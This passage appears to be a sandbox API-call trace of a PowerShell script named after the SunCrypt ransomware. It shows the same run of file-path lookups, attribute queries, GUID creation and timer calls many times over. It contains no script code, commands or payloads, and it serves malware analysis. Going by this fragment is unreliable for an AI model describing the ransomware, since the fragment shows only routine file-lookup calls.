lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.656] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701647221380) returned 1 [0103.656] EtwEventActivityIdControl () returned 0x0 [0103.656] EtwEventActivityIdControl () returned 0x0 [0103.656] EtwEventActivityIdControl () returned 0x0 [0103.656] EtwEventActivityIdControl () returned 0x0 [0103.656] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x2dda1508, Data2=0x5c12, Data3=0x4613, Data4=([0]=0xb3, [1]=0x62, [2]=0xae, [3]=0x0, [4]=0x67, [5]=0xb0, [6]=0xed, [7]=0xcd))) returned 0x0 [0103.657] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.657] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701647372514) returned 1 [0103.657] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.657] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.657] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.657] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.658] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.658] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.658] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.660] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701647690253) returned 1 [0103.660] EtwEventActivityIdControl () returned 0x0 [0103.661] EtwEventActivityIdControl () returned 0x0 [0103.661] EtwEventActivityIdControl () returned 0x0 [0103.661] EtwEventActivityIdControl () returned 0x0 [0103.661] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x96b39e3c, Data2=0xa5b2, Data3=0x4de9, Data4=([0]=0x85, [1]=0x5e, [2]=0x73, [3]=0x4d, [4]=0xfe, [5]=0x8, [6]=0x3a, [7]=0xb0))) returned 0x0 [0103.662] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.662] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701647844600) returned 1 [0103.662] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.662] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.662] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.662] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.662] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.662] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.662] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.664] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701648077595) returned 1 [0103.664] EtwEventActivityIdControl () returned 0x0 [0103.664] EtwEventActivityIdControl () returned 0x0 [0103.664] EtwEventActivityIdControl () returned 0x0 [0103.665] EtwEventActivityIdControl () returned 0x0 [0103.665] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x37920232, Data2=0x726b, Data3=0x4bb8, Data4=([0]=0x81, [1]=0x8c, [2]=0x5a, [3]=0xd8, [4]=0xd5, [5]=0x37, [6]=0x68, [7]=0x2f))) returned 0x0 [0103.665] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.665] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701648207033) returned 1 [0103.666] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.666] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.666] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.666] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.666] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.666] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.666] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.669] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701648534579) returned 1 [0103.669] EtwEventActivityIdControl () returned 0x0 [0103.669] EtwEventActivityIdControl () returned 0x0 [0103.669] EtwEventActivityIdControl () returned 0x0 [0103.669] EtwEventActivityIdControl () returned 0x0 [0103.669] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x1ce54fb0, Data2=0x11e1, Data3=0x471e, Data4=([0]=0xbc, [1]=0x50, [2]=0xae, [3]=0x5b, [4]=0x13, [5]=0x85, [6]=0x74, [7]=0x5a))) returned 0x0 [0103.670] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.670] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701648687904) returned 1 [0103.670] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.670] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.670] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.671] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.671] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.671] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.671] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.681] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701649806117) returned 1 [0103.682] EtwEventActivityIdControl () returned 0x0 [0103.682] EtwEventActivityIdControl () returned 0x0 [0103.682] EtwEventActivityIdControl () returned 0x0 [0103.682] EtwEventActivityIdControl () returned 0x0 [0103.682] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x273c55d0, Data2=0x5141, Data3=0x4a1b, Data4=([0]=0x8b, [1]=0x72, [2]=0xa6, [3]=0xc9, [4]=0xb9, [5]=0x8d, [6]=0x30, [7]=0x5b))) returned 0x0 [0103.682] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.683] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701649928761) returned 1 [0103.683] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.683] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.683] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.683] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.683] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.683] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.683] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.686] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701650238479) returned 1 [0103.686] EtwEventActivityIdControl () returned 0x0 [0103.686] EtwEventActivityIdControl () returned 0x0 [0103.686] EtwEventActivityIdControl () returned 0x0 [0103.686] EtwEventActivityIdControl () returned 0x0 [0103.686] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x492e694a, Data2=0xf292, Data3=0x4e32, Data4=([0]=0xa0, [1]=0x5a, [2]=0xbf, [3]=0x90, [4]=0x29, [5]=0x37, [6]=0xa6, [7]=0x30))) returned 0x0 [0103.687] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.687] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701650402345) returned 1 [0103.688] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.688] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.688] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.688] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.688] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.688] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.688] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.693] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701650954977) returned 1 [0103.693] EtwEventActivityIdControl () returned 0x0 [0103.693] EtwEventActivityIdControl () returned 0x0 [0103.693] EtwEventActivityIdControl () returned 0x0 [0103.693] EtwEventActivityIdControl () returned 0x0 [0103.693] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xdf978609, Data2=0xa7bf, Data3=0x46d7, Data4=([0]=0x93, [1]=0x5c, [2]=0xc3, [3]=0xe6, [4]=0x29, [5]=0x7e, [6]=0x19, [7]=0x33))) returned 0x0 [0103.694] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.694] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701651096706) returned 1 [0103.694] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.695] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.695] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.695] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.695] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.695] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.697] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701651395503) returned 1 [0103.697] EtwEventActivityIdControl () returned 0x0 [0103.698] EtwEventActivityIdControl () returned 0x0 [0103.698] EtwEventActivityIdControl () returned 0x0 [0103.698] EtwEventActivityIdControl () returned 0x0 [0103.698] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xc51b1b8f, Data2=0xbe23, Data3=0x459c, Data4=([0]=0x85, [1]=0xcc, [2]=0x90, [3]=0x5c, [4]=0x9b, [5]=0xef, [6]=0x2b, [7]=0xea))) returned 0x0 [0103.699] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.699] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701651552442) returned 1 [0103.699] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.699] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.699] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.699] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.699] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.699] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.700] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.702] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701651860357) returned 1 [0103.702] EtwEventActivityIdControl () returned 0x0 [0103.702] EtwEventActivityIdControl () returned 0x0 [0103.702] EtwEventActivityIdControl () returned 0x0 [0103.703] EtwEventActivityIdControl () returned 0x0 [0103.703] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x5e5ea9aa, Data2=0xa2e7, Data3=0x46bc, Data4=([0]=0xaf, [1]=0xb5, [2]=0xf5, [3]=0x5, [4]=0xee, [5]=0xd2, [6]=0xec, [7]=0xc0))) returned 0x0 [0103.703] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.703] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701652008809) returned 1 [0103.704] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.704] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.704] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.704] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.704] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.704] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.704] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.706] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701652221095) returned 1 [0103.706] EtwEventActivityIdControl () returned 0x0 [0103.706] EtwEventActivityIdControl () returned 0x0 [0103.706] EtwEventActivityIdControl () returned 0x0 [0103.706] EtwEventActivityIdControl () returned 0x0 [0103.706] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x7111b0b6, Data2=0xbd, Data3=0x46b9, Data4=([0]=0xa2, [1]=0xd5, [2]=0xf2, 